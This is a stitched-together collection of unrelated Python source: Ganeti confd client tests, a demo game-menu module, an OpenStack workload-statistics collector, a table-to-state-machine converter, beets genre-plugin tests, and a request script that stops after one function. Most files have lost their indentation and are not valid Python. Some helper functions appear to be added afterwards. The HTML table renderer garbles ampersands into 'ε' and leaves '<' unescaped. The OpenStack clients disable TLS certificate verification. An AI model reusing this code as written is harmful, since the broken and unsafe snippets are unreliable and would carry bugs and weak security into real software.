#!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for unittesting the confd client module"""
import socket
import unittest
from ganeti import confd
from ganeti import constants
from ganeti import errors
import ganeti.confd.client
import testutils
class ResettableMock(object):
def __init__(self, *args, **kwargs):
self.Reset()
def Reset(self):
pass
class MockLogger(ResettableMock):
def Reset(self):
self.debug_count = 0
self.warn_count = 0
self.error_count = 0
def debug(self, string):
self.debug_count += 1
def warning(self, string):
self.warn_count += 1
def error(self, string):
self.error_count += 1
class MockConfdAsyncUDPClient(ResettableMock):
def Reset(self):
self.send_count = 0
self.last_address = ''
self.last_port = -1
self.last_sent = ''
def enqueue_send(self, address, port, payload):
self.send_count += 1
self.last_payload = payload
self.last_port = port
self.last_address = address
class MockCallback(ResettableMock):
def Reset(self):
self.call_count = 0
self.last_up = None
def __call__(self, up):
"""Callback
@type up: L{ConfdUpcallPayload}
@param up: upcall payload
"""
self.call_count += 1
self.last_up = up
class MockTime(ResettableMock):
def Reset(self):
self.mytime = 1254213006.5175071
def time(self):
return self.mytime
def increase(self, delta):
self.mytime += delta
class _BaseClientTest:
"""Base class for client tests"""
mc_list = None
new_peers = None
family = None
def setUp(self):
self.mock_time = MockTime()
confd.client.time = self.mock_time
confd.client.ConfdAsyncUDPClient = MockConfdAsyncUDPClient
self.logger = MockLogger()
hmac_key = "mykeydata"
self.callback = MockCallback()
self.client = confd.client.ConfdClient(hmac_key, self.mc_list,
self.callback, logger=self.logger)
def testRequest(self):
req1 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.assertNotEqual(req1.rsalt, req2.rsalt)
self.assertEqual(req1.protocol, constants.CONFD_PROTOCOL_VERSION)
self.assertEqual(req2.protocol, constants.CONFD_PROTOCOL_VERSION)
self.assertRaises(errors.ConfdClientError, confd.client.ConfdClientRequest,
type=-33)
def testClientSend(self):
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
# Cannot send the same request twice
self.assertRaises(errors.ConfdClientError, self.client.SendRequest, req)
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
# Coverage is too big
self.assertRaises(errors.ConfdClientError, self.client.SendRequest,
req2, coverage=15)
self.assertEquals(self.client._socket.send_count,
constants.CONFD_DEFAULT_REQ_COVERAGE)
# Send with max coverage
self.client.SendRequest(req2, coverage=-1)
self.assertEquals(self.client._socket.send_count,
constants.CONFD_DEFAULT_REQ_COVERAGE + len(self.mc_list))
self.assert_(self.client._socket.last_address in self.mc_list)
def testClientExpire(self):
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
# Make a couple of seconds pass ;)
self.mock_time.increase(2)
# Now sending the second request
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req2)
self.mock_time.increase(constants.CONFD_CLIENT_EXPIRE_TIMEOUT - 1)
# First request should be expired, second one should not
self.client.ExpireRequests()
self.assertEquals(self.callback.call_count, 1)
self.assertEquals(self.callback.last_up.type, confd.client.UPCALL_EXPIRE)
self.assertEquals(self.callback.last_up.salt, req.rsalt)
self.assertEquals(self.callback.last_up.orig_request, req)
self.mock_time.increase(3)
self.assertEquals(self.callback.call_count, 1)
self.client.ExpireRequests()
self.assertEquals(self.callback.call_count, 2)
self.assertEquals(self.callback.last_up.type, confd.client.UPCALL_EXPIRE)
self.assertEquals(self.callback.last_up.salt, req2.rsalt)
self.assertEquals(self.callback.last_up.orig_request, req2)
def testClientCascadeExpire(self):
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
self.mock_time.increase(constants.CONFD_CLIENT_EXPIRE_TIMEOUT +1)
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req2)
self.assertEquals(self.callback.call_count, 1)
def testUpdatePeerList(self):
self.client.UpdatePeerList(self.new_peers)
self.assertEquals(self.client._peers, self.new_peers)
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
self.assertEquals(self.client._socket.send_count, len(self.new_peers))
self.assert_(self.client._socket.last_address in self.new_peers)
def testSetPeersFamily(self):
self.client._SetPeersAddressFamily()
self.assertEquals(self.client._family, self.family)
mixed_peers = ["192.0.2.99", "2001:db8:beef::13"]
self.client.UpdatePeerList(mixed_peers)
self.assertRaises(errors.ConfdClientError,
self.client._SetPeersAddressFamily)
class TestIP4Client(unittest.TestCase, _BaseClientTest):
"""Client tests"""
mc_list = ["192.0.2.1",
"192.0.2.2",
"192.0.2.3",
"192.0.2.4",
"192.0.2.5",
"192.0.2.6",
"192.0.2.7",
"192.0.2.8",
"192.0.2.9",
]
new_peers = ["198.51.100.1", "198.51.100.2"]
family = socket.AF_INET
def setUp(self):
unittest.TestCase.setUp(self)
_BaseClientTest.setUp(self)
class TestIP6Client(unittest.TestCase, _BaseClientTest):
"""Client tests"""
mc_list = ["2001:db8::1",
"2001:db8::2",
"2001:db8::3",
"2001:db8::4",
"2001:db8::5",
"2001:db8::6",
"2001:db8::7",
"2001:db8::8",
"2001:db8::9",
]
new_peers = ["2001:db8:beef::11", "2001:db8:beef::12"]
family = socket.AF_INET6
def setUp(self):
unittest.TestCase.setUp(self)
_BaseClientTest.setUp(self)
if __name__ == "__main__":
testutils.GanetiTestProgram()
# -------------------------------------------------------------
#
# test menu structure and testing command
#
# -------------------------------------------------------------
import random
def _generate_goto(caller, **kwargs):
return kwargs.get("name", "test_dynamic_node"), {"name": "replaced!"}
def test_start_node(caller):
menu = caller.ndb._menutree
text = """
This is an example menu.
If you enter anything except the valid options, your input will be
recorded and you will be brought to a menu entry showing your
input.
Select options or use 'quit' to exit the menu.
The menu was initialized with two variables: %s and %s.
""" % (
menu.testval,
menu.testval2,
)
options = (
{
"key": ("|yS|net", "s"),
"desc": "Set an attribute on yourself.",
"exec": lambda caller: caller.attributes.add("menuattrtest", "Test value"),
"goto": "test_set_node",
},
{
"key": ("|yL|nook", "l"),
"desc": "Look and see a custom message.",
"goto": "test_look_node",
},
{"key": ("|yV|niew", "v"), "desc": "View your own name", "goto": "test_view_node"},
{
"key": ("|yD|nynamic", "d"),
"desc": "Dynamic node",
"goto": (_generate_goto, {"name": "test_dynamic_node"}),
},
{
"key": ("|yQ|nuit", "quit", "q", "Q"),
"desc": "Quit this menu example.",
"goto": "test_end_node",
},
{"key": "_default", "goto": "test_displayinput_node"},
)
return text, options
def test_look_node(caller):
text = "This is a custom look location!"
options = {
"key": ("|yL|nook", "l"),
"desc": "Go back to the previous menu.",
"goto": "test_start_node",
}
return text, options
def test_set_node(caller):
text = (
"""
The attribute 'menuattrtest' was set to
|w%s|n
(check it with examine after quitting the menu).
This node has only one option, and one of its key aliases is the
string "_default", meaning it will catch any input, in this case
to return to the main menu. So you can e.g. press <return> to go
back now.
"""
% caller.db.menuattrtest, # optional help text for this node
"""
This is the help entry for this node. It is created by returning
the node text as a tuple - the second string in that tuple will be
used as the help text.
""",
)
options = {"key": ("back (default)", "_default"), "goto": "test_start_node"}
return text, options
def test_view_node(caller, **kwargs):
text = (
"""
Your name is |g%s|n!
click |lclook|lthere|le to trigger a look command under MXP.
This node's option has no explicit key (nor the "_default" key
set), and so gets assigned a number automatically. You can in fact
-always- use numbers (1...N) to refer to listed options also if you
don't see a string option key (try it!).
"""
% caller.key
)
if kwargs.get("executed_from_dynamic_node", False):
# we are calling this node as an exec, skip return values
caller.msg("|gCalled from dynamic node:|n \n {}".format(text))
return
else:
options = {"desc": "back to main", "goto": "test_start_node"}
return text, options
def test_displayinput_node(caller, raw_string):
text = (
"""
You entered the text:
"|w%s|n"
... which could now be handled or stored here in some way if this
was not just an example.
This node has an option with a single alias "_default", which
makes it hidden from view. It catches all input (except the
in-menu help/quit commands) and will, in this case, bring you back
to the start node.
"""
% raw_string.rstrip()
)
options = {"key": "_default", "goto": "test_start_node"}
return text, options
def _test_call(caller, raw_input, **kwargs):
mode = kwargs.get("mode", "exec")
caller.msg(
"\n|y'{}' |n_test_call|y function called with\n "
'caller: |n{}\n |yraw_input: "|n{}|y" \n kwargs: |n{}\n'.format(
mode, caller, raw_input.rstrip(), kwargs
)
)
if mode == "exec":
kwargs = {"random": random.random()}
caller.msg("function modify kwargs to {}".format(kwargs))
else:
caller.msg("|ypassing function kwargs without modification.|n")
return "test_dynamic_node", kwargs
def test_dynamic_node(caller, **kwargs):
text = """
This is a dynamic node with input:
{}
""".format(
kwargs
)
options = (
{
"desc": "pass a new random number to this node",
"goto": ("test_dynamic_node", {"random": random.random()}),
},
{
"desc": "execute a func with kwargs",
"exec": (_test_call, {"mode": "exec", "test_random": random.random()}),
},
{"desc": "dynamic_goto", "goto": (_test_call, {"mode": "goto", "goto_input": "test"})},
{
"desc": "exec test_view_node with kwargs",
"exec": ("test_view_node", {"executed_from_dynamic_node": True}),
"goto": "test_dynamic_node",
},
{"desc": "back to main", "goto": "test_start_node"},
)
return text, options
def test_end_node(caller):
text = """
This is the end of the menu and since it has no options the menu
will exit here, followed by a call of the "look" command.
"""
return text, None
# class CmdTestMenu(Command):
# """
# Test menu
#
# Usage:
# testmenu <menumodule>
#
# Starts a demo menu from a menu node definition module.
#
# """
#
# key = "testmenu"
#
# def func(self):
#
# if not self.args:
# self.caller.msg("Usage: testmenu menumodule")
# return
# # start menu
# EvMenu(
# self.caller,
# self.args.strip(),
# startnode="test_start_node",
# persistent=True,
# cmdset_mergetype="Replace",
# testval="val",
# testval2="val2",
# )
#
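# A minimal sketch (not part of the original module) of starting this demo
# menu from code rather than via the commented-out command above. It assumes
# EvMenu is importable from evennia.utils.evmenu and that `menumodule` is the
# python path to a module containing these node functions.
def _start_demo_menu(caller, menumodule):
    from evennia.utils.evmenu import EvMenu

    EvMenu(
        caller,
        menumodule,
        startnode="test_start_node",
        persistent=True,
        cmdset_mergetype="Replace",
        testval="val",
        testval2="val2",
    )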
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from cinderclient import client as cinder_client
from keystoneclient import discover as keystone_discover
from keystoneclient.v2_0 import client as keystone_client_v2
from keystoneclient.v3 import client as keystone_client_v3
from novaclient import client as nova_client
from nailgun import consts
from nailgun.db import db
from nailgun.logger import logger
from nailgun import objects
from nailgun.settings import settings
from nailgun.statistics.oswl.resources_description \
import resources_description
from nailgun.statistics import utils
class ClientProvider(object):
"""Initialize clients for OpenStack component and expose them as attrs"""
clients_version_attr_path = {
"nova": ["client", "version"],
"cinder": ["client", "version"],
"keystone": ["version"]
}
def __init__(self, cluster):
self.cluster = cluster
self._nova = None
self._cinder = None
self._keystone = None
self._credentials = None
@property
def nova(self):
if self._nova is None:
self._nova = nova_client.Client(
settings.OPENSTACK_API_VERSION["nova"],
*self.credentials,
service_type=consts.NOVA_SERVICE_TYPE.compute,
insecure=True
)
return self._nova
@property
def cinder(self):
if self._cinder is None:
self._cinder = cinder_client.Client(
settings.OPENSTACK_API_VERSION["cinder"],
*self.credentials,
insecure=True
)
return self._cinder
@property
def keystone(self):
if self._keystone is None:
# kwargs are universal for the v2 and v3 versions of the
# keystone client, which differ only in the tenant/project
# keyword name they accept
auth_kwargs = {
"username": self.credentials[0],
"password": self.credentials[1],
"tenant_name": self.credentials[2],
"project_name": self.credentials[2],
"auth_url": self.credentials[3]
}
self._keystone = self._get_keystone_client(auth_kwargs)
return self._keystone
def _get_keystone_client(self, auth_creds):
"""Create client based on returned from keystone server version data.
:param auth_creds: credentials for authentication which also are
parameters for client's instance initialization
:returns: instance of keystone client of appropriate version
:raises: exception if response from server contains version other than
2.x and 3.x
"""
discover = keystone_discover.Discover(**auth_creds)
for version_data in discover.version_data():
version = version_data["version"][0]
if version <= 2:
return keystone_client_v2.Client(insecure=True, **auth_creds)
elif version == 3:
return keystone_client_v3.Client(insecure=True, **auth_creds)
raise Exception("Failed to discover keystone version "
"for auth_url {0}".format(
auth_creds.get("auth_url"))
)
@property
def credentials(self):
if self._credentials is None:
cluster_attrs_editable = \
objects.Cluster.get_editable_attributes(self.cluster)
access_data = cluster_attrs_editable.get("workloads_collector")
if not access_data:
# If there is no workloads_collector section in the cluster
# attributes, fall back to the default credentials for the
# cluster. This is not 100% foolproof, as the user might have
# changed them by this time.
access_data = cluster_attrs_editable["access"]
os_user = access_data["user"]["value"]
os_password = access_data["password"]["value"]
os_tenant = access_data["tenant"]["value"]
auth_host = utils.get_mgmt_ip_of_cluster_controller(self.cluster)
auth_url = "http://{0}:{1}/{2}/".format(
auth_host, settings.AUTH_PORT,
settings.OPENSTACK_API_VERSION["keystone"])
self._credentials = (os_user, os_password, os_tenant, auth_url)
return self._credentials
def get_info_from_os_resource_manager(client_provider, resource_name):
"""Use OpenStack resource manager to retrieve information about resource
Utilize clients provided by client_provider instance to retrieve
data for resource_name, description of which is stored in
resources_description data structure.
:param client_provider: objects that provides instances of openstack
clients as its attributes
:param resource_name: string that contains name of resource for which
info should be collected from installation
:returns: data that store collected info
"""
resource_description = resources_description[resource_name]
client_name = resource_description["retrieved_from_component"]
client_inst = getattr(client_provider, client_name)
client_api_version = utils.get_nested_attr(
client_inst,
client_provider.clients_version_attr_path[client_name]
)
matched_api = \
resource_description["supported_api_versions"][client_api_version]
resource_manager_name = matched_api["resource_manager_name"]
resource_manager = getattr(client_inst, resource_manager_name)
attributes_white_list = matched_api["attributes_white_list"]
additional_display_options = \
matched_api.get("additional_display_options", {})
resource_info = _get_data_from_resource_manager(
resource_manager,
attributes_white_list,
additional_display_options
)
return resource_info
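# Illustrative sketch (not part of the original module): how ClientProvider and
# get_info_from_os_resource_manager are typically combined. The resource name
# "vm" is an assumption; valid names are the keys of resources_description.
def _example_collect_vm_info(cluster):
    client_provider = ClientProvider(cluster)
    # Returns a list of dicts, one per resource instance, built according to
    # the attributes white list declared in resources_description.
    return get_info_from_os_resource_manager(client_provider, "vm")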
def _get_data_from_resource_manager(resource_manager, attrs_white_list_rules,
additional_display_options):
data = []
display_options = {}
display_options.update(additional_display_options)
instances_list = resource_manager.list(**display_options)
for inst in instances_list:
inst_details = {}
obj_dict = \
inst.to_dict() if hasattr(inst, "to_dict") else inst.__dict__
for rule in attrs_white_list_rules:
try:
inst_details[rule.map_to_name] = utils.get_attr_value(
rule.path, rule.transform_func, obj_dict
)
except KeyError:
# If the retrieved attribute is a top-level key that is not
# present in obj_dict, a KeyError occurs that the
# get_attr_value function cannot handle itself, so we handle
# it here to avoid losing the whole data set collected for
# this particular resource
logger.info("{0} cannot be collected for the statistic "
"as attribute with path {1} is not present in the "
"resource manager's data".format(rule.map_to_name,
rule.path))
data.append(inst_details)
return data
def delete_expired_oswl_entries():
try:
deleted_rows_count = \
objects.OpenStackWorkloadStatsCollection.clean_expired_entries()
if deleted_rows_count == 0:
logger.info("There are no expired OSWL entries in db.")
db().commit()
logger.info("Expired OSWL entries are "
"successfully cleaned from db")
except Exception as e:
logger.exception("Exception while cleaning oswls entries from "
"db. Details: {0}".format(six.text_type(e)))
finally:
db.remove()
import collections
import csv
from . import machines
from . import syntax
__all__ = ['Table', 'from_table', 'read_csv', 'read_excel', 'to_table']
class Table:
"""A simple class that just stores a list of lists of strings.
Arguments:
rows: list of lists of strings
num_header_rows (int): number of header rows
num_header_cols (int): number of header columns
"""
def __init__(self, rows, num_header_cols=1, num_header_rows=1):
self.rows = rows #: The table contents
self.num_header_cols = num_header_cols #: Number of header columns
self.num_header_rows = num_header_rows #: Number of header rows
def __getitem__(self, i):
return self.rows[i]
def __len__(self):
return len(self.rows)
def _repr_html_(self):
result = []
result.append('<table style="font-family: Courier, monospace;">')
for i, row in enumerate(self.rows):
result.append(' <tr>')
for j, cell in enumerate(row):
cell = cell.replace('&', 'ε')
cell = cell.replace('>', '&gt;')
if i < self.num_header_rows or j < self.num_header_cols:
result.append(f' <th style="text-align: left">{cell}</th>')
else:
result.append(f' <td style="text-align: left">{cell}</td>')
result.append(' </tr>')
result.append('</table>')
return '\n'.join(result)
def addr(i, j):
return chr(ord('A')+j) + str(i+1)
def from_table(table):
"""Convert a `Table` to a `Machine`.
Example:
+------+------+------+------+------+------+------+
| | 0 | | 1 | | & | |
+------+------+------+------+------+------+------+
| | 0 | & | 1 | & | $ | & |
+======+======+======+======+======+======+======+
| >@q1 | | | | | | q2,$ |
+------+------+------+------+------+------+------+
| q2 | | q2,0 | | q2,1 | | q3,& |
+------+------+------+------+------+------+------+
| q3 | q3,& | | q3,& | | q4,& | |
+------+------+------+------+------+------+------+
| @q4 | | | | | | |
+------+------+------+------+------+------+------+
The first two rows, because they have empty first cells, are
assumed to be header rows.
In a header row, cells "fill" to the right. In the above example,
the first row effectively has cells 0, 0, 1, 1, &, &.
"""
start_state = None
accept_states = set()
transitions = []
header = True
lhs2 = []
for i, row in enumerate(table):
# Skip totally blank rows
if all(cell.strip() == '' for cell in row):
continue
# Header rows are rows whose first cell is empty
if header and row[0].strip() != '':
header = False
if header:
# Header rows have lhs values for all stores other than the first
c = None
for j, cell in enumerate(row[1:], 1):
try:
if cell.strip() == '':
# Empty headings copy from the previous heading
if c is None:
raise ValueError('missing header')
else:
c = tuple(syntax.str_to_config(cell))
except Exception as e:
e.message = f"cell {addr(i,j)}: {e.message}"
raise
while j-1 >= len(lhs2):
lhs2.append(())
lhs2[j-1] += c
else:
# First cell has lhs value for the first store
try:
q, attrs = syntax.str_to_state(row[0])
if attrs.get('start', False):
if start_state is not None:
raise ValueError("more than one start state")
start_state = q
if attrs.get('accept', False):
accept_states.add(q)
lhs1 = ([q],)
except Exception as e:
e.message = f"cell {addr(i,0)}: {e.message}"
raise
# Rest of row has right-hand sides
if len(row[1:]) != len(lhs2):
raise ValueError(f"row {i+1}: row has wrong number of cells")
for j, cell in enumerate(row[1:], 1):
try:
for rhs in syntax.str_to_configs(cell):
transitions.append((lhs1+lhs2[j-1], rhs))
except Exception as e:
e.message = f"cell {addr(i,j)}: {e.message}"
raise
if start_state is None:
raise ValueError("missing start state")
return machines.from_transitions(transitions, start_state, accept_states)
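# A usage sketch (not part of the original module): the docstring example above
# written as a plain list of lists and converted to a Machine. The cell syntax
# follows the conventions shown in the docstring.
def _example_from_table():
    rows = [
        ['',     '0',    '',     '1',    '',     '&',    ''],
        ['',     '0',    '&',    '1',    '&',    '$',    '&'],
        ['>@q1', '',     '',     '',     '',     '',     'q2,$'],
        ['q2',   '',     'q2,0', '',     'q2,1', '',     'q3,&'],
        ['q3',   'q3,&', '',     'q3,&', '',     'q4,&', ''],
        ['@q4',  '',     '',     '',     '',     '',     ''],
    ]
    return from_table(rows)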
def read_csv(filename):
"""Reads a CSV file containing a tabular description of a transition
function (see `from_table`).
"""
with open(filename) as file:
table = list(csv.reader(file))
m = from_table(table)
return m
def read_excel(filename, sheet=None):
"""Reads an Excel file containing a tabular description of a
transition function (see `from_table`).
"""
from openpyxl import load_workbook # type: ignore
wb = load_workbook(filename)
if sheet is None:
ws = wb.active
else:
ws = wb.get_sheet_by_name(sheet)
table = [[cell.value or "" for cell in row] for row in ws.rows]
return from_table(table)
def to_table(m):
"""Converts a `Machine` to a `Table`."""
rows = []
states = set()
initial_state = m.get_start_state()
final_states = m.get_accept_states()
conditions = set()
transitions = collections.defaultdict(list)
for t in m.get_transitions():
state = t[m.state]
[[q]] = state.lhs
[[r]] = state.rhs
t = t[:m.state] + t[m.state+1:]
lhs = tuple(t.lhs)
rhs = (r,)+tuple(t.rhs)
states.add(q)
conditions.add(lhs)
transitions[q,lhs].append(rhs)
states.update(final_states)
conditions = sorted(conditions)
num_header_rows = len(conditions[0])
for j in range(num_header_rows):
row = ['']
prev = None
for condition in conditions:
row.append(str(condition[j]) if condition[j] != prev else '')
prev = condition[j]
rows.append(row)
for q in sorted(states):
row = []
qstring = q
if q in final_states:
qstring = "@" + qstring
if q == initial_state:
qstring = ">" + qstring
row.append(qstring)
for condition in conditions:
row.append(syntax.configs_to_str(transitions[q,condition]))
rows.append(row)
return Table(rows, num_header_rows=num_header_rows)
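# Hedged round-trip sketch (not part of the original module): a Machine built
# by from_table can be rendered back into a Table, e.g. for display in a
# notebook via Table._repr_html_.
def _example_round_trip(rows):
    return to_table(from_table(rows))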
# This file is part of beets.
# Copyright 2016, Fabrice Laporte.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'lastgenre' plugin."""
import unittest
from unittest.mock import Mock
from test import _common
from beetsplug import lastgenre
from beets import config
from test.helper import TestHelper
class LastGenrePluginTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.plugin = lastgenre.LastGenrePlugin()
def tearDown(self):
self.teardown_beets()
def _setup_config(self, whitelist=False, canonical=False, count=1,
prefer_specific=False):
config['lastgenre']['canonical'] = canonical
config['lastgenre']['count'] = count
config['lastgenre']['prefer_specific'] = prefer_specific
if isinstance(whitelist, (bool, (str,))):
# Filename, default, or disabled.
config['lastgenre']['whitelist'] = whitelist
self.plugin.setup()
if not isinstance(whitelist, (bool, (str,))):
# Explicit list of genres.
self.plugin.whitelist = whitelist
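# Illustrative note (not part of the original tests): the `whitelist`
# argument above accepts several kinds of values --
#   whitelist=True                 -> use the plugin's default whitelist
#   whitelist=False                -> disable whitelist filtering
#   whitelist='my_genres.txt'      -> load a whitelist file (hypothetical path)
#   whitelist={'blues', 'rock'}    -> use an explicit set of genres directly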
def test_default(self):
"""Fetch genres with whitelist and c14n deactivated
"""
self._setup_config()
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues')
def test_c14n_only(self):
"""Default c14n tree funnels up to most common genre except for *wrong*
genres that stay unchanged.
"""
self._setup_config(canonical=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'Iota Blues')
def test_whitelist_only(self):
"""Default whitelist rejects *wrong* (non existing) genres.
"""
self._setup_config(whitelist=True)
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_whitelist_c14n(self):
"""Default whitelist and c14n both activated result in all parents
genres being selected (from specific to common).
"""
self._setup_config(canonical=True, whitelist=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues, Blues')
def test_whitelist_custom(self):
"""Keep only genres that are in the whitelist.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(['pop', 'blues']),
'Blues')
self._setup_config(canonical='', whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_count(self):
"""Keep the n first genres, as we expect them to be sorted from more to
less popular.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'rock', 'blues']),
'Jazz, Rock')
def test_count_c14n(self):
"""Keep the n first genres, after having applied c14n when necessary
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
canonical=True,
count=2)
# thanks to c14n, 'blues' supersedes 'country blues' and takes the
# second slot
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'country blues', 'rock']),
'Jazz, Blues')
def test_c14n_whitelist(self):
"""Genres first pass through c14n and are then filtered
"""
self._setup_config(canonical=True, whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_empty_string_enables_canonical(self):
"""For backwards compatibility, setting the `canonical` option
to the empty string enables it using the default tree.
"""
self._setup_config(canonical='', count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
def test_empty_string_enables_whitelist(self):
"""Again for backwards compatibility, setting the `whitelist`
option to the empty string enables the default set of genres.
"""
self._setup_config(whitelist='')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_prefer_specific_loads_tree(self):
"""When prefer_specific is enabled but canonical is not the
tree still has to be loaded.
"""
self._setup_config(prefer_specific=True, canonical=False)
self.assertNotEqual(self.plugin.c14n_branches, [])
def test_prefer_specific_without_canonical(self):
"""Prefer_specific works without canonical.
"""
self._setup_config(prefer_specific=True, canonical=False, count=4)
self.assertEqual(self.plugin._resolve_genres(
['math rock', 'post-rock']),
'Post-Rock, Math Rock')
def test_no_duplicate(self):
"""Remove duplicated genres.
"""
self._setup_config(count=99)
self.assertEqual(self.plugin._resolve_genres(['blues', 'blues']),
'Blues')
def test_tags_for(self):
class MockPylastElem:
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
class MockPylastObj:
def get_top_tags(self):
tag1 = Mock()
tag1.weight = 90
tag1.item = MockPylastElem('Pop')
tag2 = Mock()
tag2.weight = 40
tag2.item = MockPylastElem('Rap')
return [tag1, tag2]
plugin = lastgenre.LastGenrePlugin()
res = plugin._tags_for(MockPylastObj())
self.assertEqual(res, ['pop', 'rap'])
res = plugin._tags_for(MockPylastObj(), min_weight=50)
self.assertEqual(res, ['pop'])
def test_get_genre(self):
mock_genres = {'track': '1', 'album': '2', 'artist': '3'}
def mock_fetch_track_genre(self, obj=None):
return mock_genres['track']
def mock_fetch_album_genre(self, obj):
return mock_genres['album']
def mock_fetch_artist_genre(self, obj):
return mock_genres['artist']
lastgenre.LastGenrePlugin.fetch_track_genre = mock_fetch_track_genre
lastgenre.LastGenrePlugin.fetch_album_genre = mock_fetch_album_genre
lastgenre.LastGenrePlugin.fetch_artist_genre = mock_fetch_artist_genre
self._setup_config(whitelist=False)
item = _common.item()
item.genre = mock_genres['track']
config['lastgenre'] = {'force': False}
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'keep'))
config['lastgenre'] = {'force': True, 'source': 'track'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['track'], 'track'))
config['lastgenre'] = {'source': 'album'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['album'], 'album'))
config['lastgenre'] = {'source': 'artist'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['artist'], 'artist'))
mock_genres['artist'] = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'original'))
config['lastgenre'] = {'fallback': 'rap'}
item.genre = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (config['lastgenre']['fallback'].get(),
'fallback'))
def test_sort_by_depth(self):
self._setup_config(canonical=True)
# Normal case.
tags = ('electronic', 'ambient', 'post-rock', 'downtempo')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(
res, ['post-rock', 'downtempo', 'ambient', 'electronic'])
# Non-canonical tag ('chillout') present.
tags = ('electronic', 'ambient', 'chillout')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(res, ['ambient', 'electronic'])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
'''
Retrieve game list (by Requests).
Update log: (date / version / author : comments)
2020-07-10 / 1.0.0 / Du Jiang : Creation
Notes:
1. It requires a 3rd party python lib (at least): requests.
'''
import csv
import getopt
from http import HTTPStatus
import json
import sys
from time import localtime, strftime, time
import requests
# Global variables.
# The value can be updated by command line options.
__data_type = None
__output_file_path = None
__PAGE_SIZE = 99
def check_url(url):
'''
Use requests to get the URL, and return the HTTP status code and parsed body.
@param url: A string of URL.
@return: A tuple of (HTTP response status code, parsed JSON response).
Raises the underlying exception if the request fails.
'''
print("url =", url)
status_code = None
json_data = None
try:
response = requests.get(url, timeout = 10)
# print("response =", response)
print("response.status_code =", response.status_code)
if response.history:
status_code = HTTPStatus.OK
print("response.status_code (Due to redirected) =", status_code)
else:
status_code = response.status_code
response.raise_for_status()
json_data = json.loads(response.text)
except Exception as e:
print("Check url failed. Exception = {0}".format(e))
raise e
return status_code, json_data
